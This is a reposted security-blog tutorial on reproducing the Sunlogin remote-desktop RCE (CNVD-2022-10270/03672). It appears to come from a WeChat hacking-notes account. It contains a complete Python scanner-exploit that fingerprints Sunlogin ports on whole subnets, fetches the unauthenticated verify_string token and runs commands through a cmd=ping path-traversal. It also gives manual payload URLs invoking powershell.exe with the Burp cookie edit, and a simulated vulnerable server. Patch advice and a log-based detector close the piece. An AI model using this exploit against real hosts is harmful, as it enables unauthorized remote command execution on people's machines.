Sunlogin (向日葵) is one of the most widely used remote-office tools in daily work, and currently the most common one on the Chinese market. This article walks through exploiting and reproducing its CNVD-2022-10270/CNVD-2022-03672 vulnerability.
Lab environment
- Sunlogin <= 11.0.0.33
- Kali Linux
Port scanning
First install the old Sunlogin version 11.0.0.33 in the local lab. After installation, scan the target with nmap. The client's HTTP service listens on a random high port, so the scan range has to cover it; the 45000-55000 range cannot reach the ports found below, so use the wider range the script falls back to:
nmap -p 40000-65535 192.168.50.105
The scan shows the target exposes ports 61376 and 61387.

For convenience, the following Python script automates the detection, and it also supports scanning a whole subnet.
import argparse
import json
import re as reg
import sys
import time
from multiprocessing.pool import ThreadPool
from subprocess import PIPE, Popen

import IPy
import requests

# Command output is appended to a timestamped text file in the working directory.
filename = time.strftime("%Y-%m-%d %H-%M-%S", time.localtime()) + "_sunlogin.txt"

# Browser-like headers copied from the Burp request; the same set is used for both requests.
BROWSER_HEADERS = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0",
                   "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
                   "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                   "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1",
                   "Cache-Control": "max-age=0"}


def pwn(target):
    """Fetch the verify_string from the rpc endpoint, then replay it as the CID cookie on a
    /check request whose cmd=ping value traverses out of the ping path (the RCE)."""
    session = requests.session()
    burp0_url = "http://%s/cgi-bin/rpc?action=verify-haras" % target
    res = json.loads(session.get(burp0_url, headers=BROWSER_HEADERS).text)
    token = res.get('verify_string')
    print("[+] Get token: {}".format(token))
    burp0_url = "http://%s/check?cmd=ping../../../../../../../../../../../windows/system32/whoami" % target
    burp0_cookies = {"CID": token}
    res = session.get(burp0_url, headers=BROWSER_HEADERS, cookies=burp0_cookies)
    print("[+] Get command result: \r\n\t%s" % res.text)
    with open(file=filename, mode="a") as f:
        f.write(target + " Get command result:" + res.text + "\n")


def curl(host_WithPort):
    """Fingerprint: a Sunlogin client answers an unauthenticated GET / with exactly this JSON."""
    url = "http://%s" % host_WithPort
    try:
        result = requests.get(url, timeout=5)
        if result.text == '{"success":false,"msg":"Verification failure"}':
            return host_WithPort
    except requests.RequestException:
        pass
    return None


def fuzz_sunloginPort(target):
    target = str(target).strip()
    print("[*] %s\tFuzzing sunlogin port" % target)
    # Argument list instead of shell=True, so a hostile line in the -f file cannot inject shell commands.
    process = Popen(["nmap", "-p", "10000-65535", "--min-rate=10000", "-T4", target], stdout=PIPE, stderr=None)
    # process = Popen(["nmap", "-p", "40000-65535", "-T2", target], stdout=PIPE, stderr=None)
    ports_raw = process.communicate()[0].decode("utf-8", errors="ignore")
    ports = reg.findall(r"(\d+)/tcp", ports_raw)
    print("[*] Get ports: %s" % ports)
    if not ports:
        return
    print("[*] Enumerating port of sunlogin")
    host_WithPort = [target + ":" + x for x in ports]
    tp = ThreadPool(50)
    result = tp.map(curl, host_WithPort)
    result_filter = [i for i in result if i]
    if not result_filter:
        print("[-] Could not find sunlogin port or target not vulnerable")
        return
    print("[*] Target may be vulnerable, trying to pwn it.")
    for i in result_filter:
        pwn(i)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(add_help=True, description="Sunlogin client RCE exploit with port fuzzing")
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('-t', '--target', action='store',
                       help="specify target with sunlogin client installed, supports 192.168.1.1 or 192.168.1.1/24")
    group.add_argument('-f', '--file', action='store', help="Specify the destination IP file")
    options = parser.parse_args()
    if options.target is None and options.file is None:
        parser.print_help()
        sys.exit(1)
    if options.target is None:
        with open(file=options.file, mode="r") as f:
            hosts = f.readlines()
        for ip in hosts:
            if ip.strip():
                fuzz_sunloginPort(ip.strip())
    elif "/" in options.target:
        try:
            hosts = IPy.IP(options.target)
            for host in hosts:
                fuzz_sunloginPort(host)
        except Exception as e:
            print(e)
    else:
        fuzz_sunloginPort(options.target)

Reproduction
In a browser, request http://<ip>:<port>/cgi-bin/rpc?action=verify-haras, trying each candidate port in turn until one answers with a JSON body containing verify_string. That value is the session token that is later sent as the CID cookie.
Once the port is confirmed this way, test with the payload:
payload
http://192.168.50.105:61387/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+whoami
Request the payload URL and intercept it in Burp. Change
Cookie: YqRx8XziEo3PCASesFfsfP5tZWk344Zl
to
Cookie: CID=YqRx8XziEo3PCASesFfsfP5tZWk344Zl
where the value is the verify_string obtained in the previous step. The response then carries the output of whoami.
Likewise, replacing the trailing whoami with another command, such as ipconfig, runs that command instead.
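To make the two-step exchange above concrete, here is an added example that is not part of the original post and not Sunlogin's code: a constructed in-process HTTP stand-in that answers the two requests the post relies on (handing out verify_string without authentication, then trusting a cmd=ping prefix and using the remainder as a path once the CID cookie matches), plus the client side that fetches the token and replays it. The token value, the "executed:" reply format and the assumption that the rpc endpoint needs no cookie are all constructed for the demo.

```python
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit
from urllib.request import Request, urlopen

# Constructed values: the token mirrors the CID shown in the Burp step of the post,
# and the payload is the one the post uses against port 61387 (9 x "../").
VERIFY_STRING = "YqRx8XziEo3PCASesFfsfP5tZWk344Zl"
PAYLOAD = ("ping../../../../../../../../../windows/system32/"
           "WindowsPowerShell/v1.0/powershell.exe+whoami")
VERIFY_FAILURE = '{"success":false,"msg":"Verification failure"}'


class FakeSunloginHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the client's HTTP service. It reproduces only the two
    request/response shapes the post relies on; it is not the real product's code."""

    def _send(self, body):
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def _cookies(self):
        raw = self.headers.get("Cookie", "")
        return dict(c.strip().split("=", 1) for c in raw.split(";") if "=" in c)

    def do_GET(self):
        parts = urlsplit(self.path)
        qs = parse_qs(parts.query)
        if parts.path == "/cgi-bin/rpc" and qs.get("action") == ["verify-haras"]:
            # Step 1: the token is handed out without any authentication.
            self._send(json.dumps({"success": True, "verify_string": VERIFY_STRING}))
        elif parts.path == "/check" and self._cookies().get("CID") == VERIFY_STRING:
            cmd = qs.get("cmd", [""])[0]   # parse_qs already turns '+' into a space
            if cmd.startswith("ping"):
                # Step 2 (the bug): "ping" is trusted as a prefix and the remainder is
                # used as the executable path, so "../" walks out to any binary.
                self._send("executed: " + cmd[len("ping"):])
            else:
                self._send(VERIFY_FAILURE)
        else:
            self._send(VERIFY_FAILURE)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def get_verify_string(base):
    """Client side of step 1: read verify_string from the rpc endpoint."""
    with urlopen(base + "/cgi-bin/rpc?action=verify-haras", timeout=5) as r:
        return json.loads(r.read().decode()).get("verify_string")


def run_cmd(base, cid, cmd):
    """Client side of step 2: replay the token as the CID cookie on /check."""
    req = Request(base + "/check?cmd=" + cmd, headers={"Cookie": "CID=" + cid})
    with urlopen(req, timeout=5) as r:
        return r.read().decode()


def run_demo():
    """Run both sides in-process; returns (reply without cookie, token, reply with cookie)."""
    server = HTTPServer(("127.0.0.1", 0), FakeSunloginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    base = "http://127.0.0.1:%d" % server.server_address[1]
    try:
        with urlopen(base + "/check?cmd=" + PAYLOAD, timeout=5) as r:
            without_cookie = r.read().decode()   # what a browser gets before the CID is set
        cid = get_verify_string(base)
        with_cookie = run_cmd(base, cid, PAYLOAD)
    finally:
        server.shutdown()
        server.server_close()
    return without_cookie, cid, with_cookie


if __name__ == "__main__":
    for line in run_demo():
        print(line)
```

The first /check request, sent before the cookie is set, gets the same "Verification failure" JSON that the scanner script uses as a fingerprint; only after verify_string is replayed as CID does the traversal path reach the command handler, which is exactly the Burp edit described above.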


Security advice
This is a high-severity vulnerability; update to the latest version as soon as possible. The same unauthenticated "Verification failure" banner the scanner keys on can be used defensively to inventory hosts that still expose a vulnerable client on a high port, and the client's HTTP port should not be reachable from untrusted network segments.
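On the detection side, the two requests the exploit needs (an unauthenticated fetch of verify-haras, then a /check request whose cmd=ping value contains directory traversal) are easy to spot in web-proxy or network-sensor logs. The following is an added example, not from the original post: it runs a small classifier over constructed request lines and correlates per source address, so that a client that fetched a token and then sent a traversal command is reported as a complete exploit chain. The log format and all addresses are constructed for the demo.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample traffic (not from the post): "<client> <server:port> <method> <target>".
# Line 4 uses URL-encoded traversal and backslashes to show that decoding matters.
SAMPLE_LOG = """\
10.0.0.8 192.168.50.105:61387 GET /cgi-bin/rpc?action=verify-haras
10.0.0.8 192.168.50.105:61387 GET /check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+whoami
10.0.0.9 192.168.50.105:61387 GET /check?cmd=ping192.168.50.1
10.0.0.8 192.168.50.105:61387 GET /check?cmd=ping..%2F..%2F..%2Fwindows%5Csystem32%5Ccmd.exe+/c+ipconfig
10.0.0.12 192.168.50.105:61387 GET /cgi-bin/rpc?action=verify-haras
"""

# "../" or "..\" anywhere after the ping prefix is the traversal primitive the exploit relies on.
TRAVERSAL = re.compile(r"\.\.[\\/]")


def parse_line(line):
    """Split one constructed log line into (client, server, path, decoded query dict)."""
    src, dst, _method, target = line.split(maxsplit=3)
    parts = urlsplit(target)
    return src, dst, parts.path, parse_qs(parts.query)   # parse_qs percent-decodes values


def classify(line):
    """Return (client, verdict): 'token_fetch', 'traversal_rce' or None for benign traffic."""
    src, _dst, path, qs = parse_line(line)
    if path == "/cgi-bin/rpc" and qs.get("action") == ["verify-haras"]:
        return src, "token_fetch"
    if path == "/check":
        cmd = qs.get("cmd", [""])[0]
        # A legitimate ping target is a host name or address; traversal after "ping" is not.
        if cmd.startswith("ping") and TRAVERSAL.search(cmd[len("ping"):]):
            return src, "traversal_rce"
    return src, None


def correlate(log_text):
    """Per client: 'exploit_chain' (token fetch + traversal), 'exploit' (traversal only)
    or 'recon' (token fetch only). Clients with only benign requests are omitted."""
    events = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        src, verdict = classify(line)
        if verdict:
            events.setdefault(src, set()).add(verdict)
    report = {}
    for src, seen in events.items():
        if "traversal_rce" in seen:
            report[src] = "exploit_chain" if "token_fetch" in seen else "exploit"
        else:
            report[src] = "recon"
    return report


if __name__ == "__main__":
    for src, verdict in correlate(SAMPLE_LOG).items():
        print(src, verdict)
```

The decoded cmd value is what gets matched, so the encoded variant on the fourth line is caught just like the plain one, and a normal `cmd=ping<host>` from another client produces no alert; a lone verify-haras fetch is still worth surfacing as reconnaissance because the token is issued without authentication.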
Originally published on the WeChat public account kali黑客笔记: 向日葵RCE复现(CNVD-2022-10270/CNVD-2022-03672)
Compiled by 极客之音; article link: https://www.bmabk.com/index.php/post/151441.html